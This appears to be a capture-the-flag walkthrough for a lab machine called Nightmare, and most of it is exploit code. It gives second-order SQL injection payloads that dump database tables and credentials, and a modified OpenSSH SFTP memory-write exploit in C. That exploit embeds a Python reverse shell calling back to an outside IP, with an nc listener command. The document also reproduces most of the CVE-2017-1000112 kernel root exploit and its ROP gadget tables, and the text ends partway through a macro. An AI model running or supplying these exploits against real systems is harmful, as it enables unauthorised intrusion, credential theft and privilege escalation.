- lets begin the Nightmare
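- I found a second-order SQL injection in the register page: the username is stored at registration and only ends up inside a SQL query later, after logging in with it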
- open http://10.10.10.66/register.php
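- go to Inspect Element and change the user field's maxlength="30" to "" (the limit is set only in the page's HTML, so editing it in the browser removes it), then put this in the user field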
- username : ') UNION select table_schema,table_name FROM information_Schema.tables;#
- password :any you want just register than login with same details
- after login voila u find there is sysadmin user lets see what is inside there
- to see the data logout first goto register page again and change the max length to unlimited
- now put
- username:') union select * from sysadmin.users#
- password: anything u want
- signup and login voila u found many username and password but i think ftpuser will work
- ftpuser
- @whereyougo?
- that is sftp
- we found exploit https://github.com/0x90/openssh-sftp-sploit/blob/master/sshsploit.c
- need to modify
- if (argc != 5) fprintf(stderr, "invocation: ./exploit host port user 'shell commands here'\n"), exit(1);
- remove this on code
- change and add
- char target_host[] = "10.10.10.66";
- char target_user[] = "ftpuser";
- int port=2222;
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
- printf("Commands: %s\n",shell_commands);
- ssh_session my_ssh_session;
- int rc;
- char password[]="@whereyougo?";
- // Authenticate ourselves
- //password = "@whereyougo?";
- rc = ssh_userauth_password(my_ssh_session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS)
- remove /lib/x86_64-linux-gnu/libc-2.13.so this
- change
- unsigned int start_addr, end_addr, offset;
- char *libc_path = NULL;
- unsigned int stack_start_addr = 0, stack_end_addr;
- char *system_offset_str;
- slurp_file("system.addr", &system_offset_str);
- unsigned int system_offset;
- if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
- unsigned int remote_system_addr = start_addr+system_offset-offset;
- printf("remote system() function is at %x\n", remote_system_addr);
- printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
- char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
- if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
- unsigned int gadget_address = start_addr + (gadget-(libc+offset));
- unsigned int ret_address = gadget_address+1;
- printf("found gadget at %x\n", gadget_address);
- printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
- printf("doing it the quick-and-dirty way (that means: pray that the target"
- "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
- unsigned int stack_len = stack_end_addr - stack_start_addr;
- if (stack_len > 32000) {
- stack_len = 32000;
- stack_start_addr = stack_end_addr - stack_len;
- }
- printf("here1\n");
- char *new_stack = malloc(stack_len);
- printf("here2\n");
- printf("sizeofint = %u\n",sizeof(int));
- // first fill it with our ret slide
- for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
- *s = ret_address;
- }
- // put some shell commands in the head
- strcpy(new_stack, shell_commands);
- // put the mini-ROP-chain at the end
- // [address of pop rdi] [stack head] [address of system]
- unsigned int *se = (void*)(new_stack + stack_len);
- se[-3] = remote_system_addr;
- se[-2] = gadget_address;
- se[-1] = stack_start_addr;
- // now send over the rest right-to-left
- for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
- after modify
- let save it in shell.c
- /*
- OpenSSH <=6.6 SFTP misconfiguration exploit for 64bit Linux
- Link:
- http://seclists.org/fulldisclosure/2014/Oct/35
- Build:
- gcc sshsploit.c -o sshsploit -std=c99 -lssh
- Usage:
- ./ssh sploit host port user command
- */
- #define _GNU_SOURCE
- // THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
- // TRY TO ATTACK BACK, THE CODE IS SLOPPY!
- // (In other words, please don't use this against other people's machines.)
- #include <libssh/libssh.h>
- #include <libssh/sftp.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <string.h>
- #include <errno.h>
- #define min(a,b) (((a)<(b))?(a):(b))
- sftp_session sftp;
/*
 * Download the remote file `rpath` over the global SFTP session `sftp` into a
 * heap buffer stored in *out, and NUL-terminate it.
 *
 * Returns the number of bytes read (terminator not counted). A failed remote
 * open or read prints a message and ends the process with status 1. The
 * buffer starts at 4000 bytes and is quadrupled each time it fills up.
 * NOTE(review): the calloc/realloc results are used without a NULL check.
 */
size_t grab_file(char *rpath, char **out) {
    size_t capacity = 4000;
    size_t length = 0;

    *out = calloc(1, capacity + 1);

    sftp_file remote = sftp_open(sftp, rpath, O_RDONLY, 0);
    if (remote == NULL) {
        fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp));
        exit(1);
    }

    for (;;) {
        ssize_t got = sftp_read(remote, *out + length, capacity - length);
        if (got < 0) {
            fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp));
            exit(1);
        }
        if (got == 0) {
            /* End of file. */
            break;
        }
        length += got;
        if (length == capacity) {
            capacity *= 4;
            *out = realloc(*out, capacity);
        }
    }

    (*out)[length] = '\0';
    sftp_close(remote);
    return length;
}
/*
 * Write `len` bytes from `buf` to the local file `name`, creating or
 * truncating it. Any open, write or close failure prints a message and ends
 * the process with status 1.
 */
void dump_file(char *name, void *buf, size_t len) {
    FILE *fp = fopen(name, "w+");
    if (fp == NULL) {
        perror("can't write to local file");
        exit(1);
    }

    size_t written = fwrite(buf, 1, len, fp);
    if (written != len) {
        fprintf(stderr, "local write failed\n");
        exit(1);
    }

    if (fclose(fp) != 0) {
        fprintf(stderr, "fclose error\n");
        exit(1);
    }
}
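/*
 * Read the whole local file `path` into a heap buffer stored in *out and
 * NUL-terminate it.
 *
 * Returns the number of bytes read (terminator not counted); the caller owns
 * *out. Any allocation, open, read or close failure prints a message and ends
 * the process with status 1.
 */
size_t slurp_file(char *path, char **out) {
    size_t allocated = 4000, used = 0;

    *out = calloc(1, allocated + 1);
    if (*out == NULL) {
        perror("allocating read buffer failed");
        exit(1);
    }

    FILE *f = fopen(path, "r");
    if (f == NULL) {
        perror("opening local file failed");
        exit(1);
    }

    for (;;) {
        /* fread() returns size_t and never a negative value, so a read
         * error has to be detected with ferror() once it returns 0. */
        size_t nbytes = fread(*out + used, 1, allocated - used, f);
        if (nbytes == 0) {
            if (ferror(f)) {
                fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno));
                exit(1);
            }
            (*out)[used] = '\0';
            if (fclose(f)) {
                fprintf(stderr, "fclose error\n");
                exit(1);
            }
            return used;
        }
        used += nbytes;
        if (used == allocated) {
            allocated *= 4;
            /* Grow through a temporary so a failed realloc is noticed
             * instead of dereferencing NULL on the next read. */
            char *grown = realloc(*out, allocated + 1);
            if (grown == NULL) {
                perror("growing read buffer failed");
                exit(1);
            }
            *out = grown;
        }
    }
}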
- // Entry point of the modified SFTP PoC. argc/argv are unused: host, port, user,
- // password and the command string are hard-coded below. The visible flow is:
- // log in over SSH, open an SFTP session, read the remote process's
- // /proc/self/maps, download its libc, compute addresses from both, then write
- // a prepared buffer into the remote stack through /proc/self/mem.
- // NOTE(review): every step after login depends on the SFTP session being able
- // to open /proc/self/maps and /proc/self/mem; presumably an account confined
- // to a directory tree without /proc (e.g. sshd ChrootDirectory) cannot reach
- // them — confirm against the advisory linked in the file header.
- int main(int argc, char **argv) {
- char target_host[] = "10.10.10.66";
- char target_user[] = "ftpuser";
- int port=2222;
- // Command string; it is later copied to the head of the buffer written to the remote stack.
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
- printf("Commands: %s\n",shell_commands);
- int verbosity = SSH_LOG_PROTOCOL;
- ssh_session my_ssh_session;
- int rc;
- char password[]="@whereyougo?";
- // Open session and set options
- my_ssh_session = ssh_new();
- if (my_ssh_session == NULL) exit(-1);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
- ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY, &verbosity);
- // Connect to server
- rc = ssh_connect(my_ssh_session);
- if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- // Authenticate ourselves
- //password = "@whereyougo?";
- rc = ssh_userauth_password(my_ssh_session, NULL, password);
- if (rc != SSH_AUTH_SUCCESS)
- fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- // Start the SFTP subsystem on the authenticated session; `sftp` is the file-scope handle used by grab_file().
- sftp = sftp_new(my_ssh_session);
- if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
- rc = sftp_init(sftp);
- if (rc != SSH_OK) {
- fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
- sftp_free(sftp);
- return rc;
- }
- // Fetch the memory map of the remote process serving this SFTP session.
- char *mappings;
- grab_file("/proc/self/maps", &mappings);
- //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
- printf("got /proc/self/maps. looking for libc...\n");
- // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
- unsigned int start_addr, end_addr, offset;
- char *libc_path = NULL;
- unsigned int stack_start_addr = 0, stack_end_addr;
- // Walk the map line by line: take start/end/offset and the path from the
- // executable libc mapping, and start/end from the [stack] mapping.
- for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
- if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
- if (libc_path) fprintf(stderr, "warning: two times libc?\n");
- printf("mapping line: %s\n", p);
- if (sscanf(p, "%x-%x %*4c %x", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
- libc_path = strdup(strchr(p, '/'));
- if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
- }
- if (strstr(p, "[stack]")) {
- if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
- printf("mapping line: %s\n", p);
- if (sscanf(p, "%x-%x ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
- }
- }
- if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
- if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
- printf("remote libc is at %s\n", libc_path);
- printf("offset %x from libc is mapped to %x-%x\n", offset, start_addr, end_addr);
- // Download the remote libc and keep a local copy as libc.so.
- char *libc;
- size_t libc_size = grab_file(libc_path, &libc);
- dump_file("libc.so", libc, libc_size);
- printf("downloaded libc, size is %zu bytes\n", libc_size);
- // Shells out to objdump/grep/cut on the local copy; the result is read back from system.addr.
- system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
- char *system_offset_str;
- slurp_file("system.addr", &system_offset_str);
- unsigned int system_offset;
- if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
- unsigned int remote_system_addr = start_addr+system_offset-offset;
- printf("remote system() function is at %x\n", remote_system_addr);
- printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
- char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
- if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
- unsigned int gadget_address = start_addr + (gadget-(libc+offset));
- unsigned int ret_address = gadget_address+1;
- printf("found gadget at %x\n", gadget_address);
- printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
- printf("doing it the quick-and-dirty way (that means: pray that the target"
- "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
- // Only the top 32000 bytes of the remote stack range are targeted.
- unsigned int stack_len = stack_end_addr - stack_start_addr;
- if (stack_len > 32000) {
- stack_len = 32000;
- stack_start_addr = stack_end_addr - stack_len;
- }
- printf("here1\n");
- char *new_stack = malloc(stack_len);
- printf("here2\n");
- printf("sizeofint = %u\n",sizeof(int));
- // first fill it with our ret slide
- for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
- *s = ret_address;
- }
- // put some shell commands in the head
- strcpy(new_stack, shell_commands);
- // put the mini-ROP-chain at the end
- // [address of pop rdi] [stack head] [address of system]
- unsigned int *se = (void*)(new_stack + stack_len);
- se[-3] = remote_system_addr;
- se[-2] = gadget_address;
- se[-1] = stack_start_addr;
- printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
- // The remote process's own memory is opened read/write through the SFTP session.
- sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
- if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
- // first send over the string
- rc = sftp_seek(mem, stack_start_addr);
- if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
- ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
- if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
- // now send over the rest right-to-left
- for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
- rc = sftp_seek(mem, stack_start_addr+off);
- if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
- mem_written = sftp_write(mem, new_stack+off, 32000);
- if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
- }
- return 0;
- }
- Change the IP to your own and compile it. Don't change the port, because Nightmare doesn't accept any other port except 80 and 443
- gcc shell.c -o shell -std=c99 -lssh
- start nc
- nc -lvnp 80
- ./shell
- u will get shell
- after than
- put on nc /usr/bin/sls -b '
- bash -ip'
- then you get a shell with the decoder group
- after that you can read the user hash; to get root we have to use a kernel exploit
- see there uname -an
- after searching we get kernel exploit
- https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
- to see author link we will modify it https://ricklarabee.blogspot.in/2017/12/adapting-poc-for-cve-2017-1000112-to.html
- now lets modify some details
- change
- // Will be overwritten by detect_versions().
- int kernel = 38;
- i think i have everything i have modified
- now save this in poc.c in your system
- // A proof-of-concept local root exploit for CVE-2017-1000112.
- // Includes KASLR and SMEP bypasses. No SMAP bypass.
- // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
- //
- // Usage:
- // user@ubuntu:~$ uname -a
- // Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
- // user@ubuntu:~$ whoami
- // user
- // user@ubuntu:~$ id
- // uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
- // user@ubuntu:~$ gcc pwn.c -o pwn
- // user@ubuntu:~$ ./pwn
- // [.] starting
- // [.] checking distro and kernel versions
- // [.] kernel version '4.8.0-58-generic' detected
- // [~] done, versions looks good
- // [.] checking SMEP and SMAP
- // [~] done, looks good
- // [.] setting up namespace sandbox
- // [~] done, namespace sandbox set up
- // [.] KASLR bypass enabled, getting kernel addr
- // [~] done, kernel text: ffffffffae400000
- // [.] commit_creds: ffffffffae4a5d20
- // [.] prepare_kernel_cred: ffffffffae4a6110
- // [.] SMEP bypass enabled, mmapping fake stack
- // [~] done, fake stack mmapped
- // [.] executing payload ffffffffae40008d
- // [~] done, should be root now
- // [.] checking if we got root
- // [+] got r00t ^_^
- // root@ubuntu:/home/user# whoami
- // root
- // root@ubuntu:/home/user# id
- // uid=0(root) gid=0(root) groups=0(root)
- // root@ubuntu:/home/user# cat /etc/shadow
- // root:!:17246:0:99999:7:::
- // daemon:*:17212:0:99999:7:::
- // bin:*:17212:0:99999:7:::
- // sys:*:17212:0:99999:7:::
- // ...
- //
- // Andrey Konovalov <andreyknvl@gmail.com>
- #define _GNU_SOURCE
- #include <assert.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <sched.h>
- #include <stdarg.h>
- #include <stdbool.h>
- #include <stdint.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
- #include <linux/socket.h>
- #include <netinet/ip.h>
- #include <sys/klog.h>
- #include <sys/mman.h>
- #include <sys/utsname.h>
- #define ENABLE_KASLR_BYPASS 1
- #define ENABLE_SMEP_BYPASS 1
- // Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
- unsigned long KERNEL_BASE = 0xffffffff81000000ul;
- // Will be overwritten by detect_versions().
- int kernel = 38;
- // One row of the kernels[] table: a distro codename, a kernel release string,
- // and twelve offsets. The macros further down add KERNEL_BASE to each offset
- // to form an address for the row selected by the global `kernel`.
- struct kernel_info {
- const char* distro;
- const char* version;
- uint64_t commit_creds;
- uint64_t prepare_kernel_cred;
- uint64_t xchg_eax_esp_ret;
- uint64_t pop_rdi_ret;
- uint64_t mov_dword_ptr_rdi_eax_ret;
- uint64_t mov_rax_cr4_ret;
- uint64_t neg_rax_ret;
- uint64_t pop_rcx_ret;
- uint64_t or_rax_rcx_ret;
- uint64_t xchg_eax_edi_ret;
- uint64_t mov_cr4_rdi_ret;
- uint64_t jmp_rcx;
- };
- struct kernel_info kernels[] = {
- { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
- { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
- { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
- { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
- { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
- { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
- { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
- { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
- { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
- { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
- { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
- { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
- { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
- { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
- { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
- };
- // Used to get root privileges.
- #define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds)
- #define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
- // Used when ENABLE_SMEP_BYPASS is used.
- // - xchg eax, esp ; ret
- // - pop rdi ; ret
- // - mov dword ptr [rdi], eax ; ret
- // - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
- // - neg rax ; ret
- // - pop rcx ; ret
- // - or rax, rcx ; ret
- // - xchg eax, edi ; ret
- // - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
- // - jmp rcx
- #define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
- #define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret)
- #define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
- #define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
- #define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret)
- #define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret)
- #define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
- #define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
- #define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
- #define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx)
- // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
- // Function-pointer types used to call the two kernel routines by address.
- typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
- typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
- // Calls the routine at PREPARE_KERNEL_CRED with argument 0 and hands its result
- // to the routine at COMMIT_CREDS. Both addresses are KERNEL_BASE plus an offset
- // taken from the kernels[] row selected by `kernel`. Reached from the `payload`
- // asm label via `call get_root`.
- void get_root(void) {
- ((_commit_creds)(COMMIT_CREDS))(
- ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
- }
- // * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
- uint64_t saved_esp;
- // Unfortunately GCC does not support `__attribute__((naked))` on x86, which
- // can be used to omit a function's prologue, so I had to use this weird
- // wrapper hack as a workaround. Note: Clang does support it, which means it
- // has better support of GCC attributes than GCC itself. Funny.
- // Exists only to host the asm label `payload`. Per the asm text: rsp is
- // rebuilt from the upper 32 bits of rbp plus the value of saved_esp, get_root
- // is called, and control leaves with `ret`.
- void wrapper() {
- asm volatile (" \n\
- payload: \n\
- movq %%rbp, %%rax \n\
- movq $0xffffffff00000000, %%rdx \n\
- andq %%rdx, %%rax \n\
- movq %0, %%rdx \n\
- addq %%rdx, %%rax \n\
- movq %%rax, %%rsp \n\
- call get_root \n\
- ret \n\
- " : : "m"(saved_esp) : );
- }
- void payload();
- #define CHAIN_SAVE_ESP \
- *stack++ = POP_RDI_RET; \
- *stack++ = (uint64_t)&saved_esp; \
- *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
- #define SMEP_MASK 0x100000
- #define CHAIN_DISABLE_SMEP \
- *stack++ = MOV_RAX_CR4_RET; \
- *stack++ = NEG_RAX_RET; \
- *stack++ = POP_RCX_RET; \
- *stack++ = SMEP_MASK; \
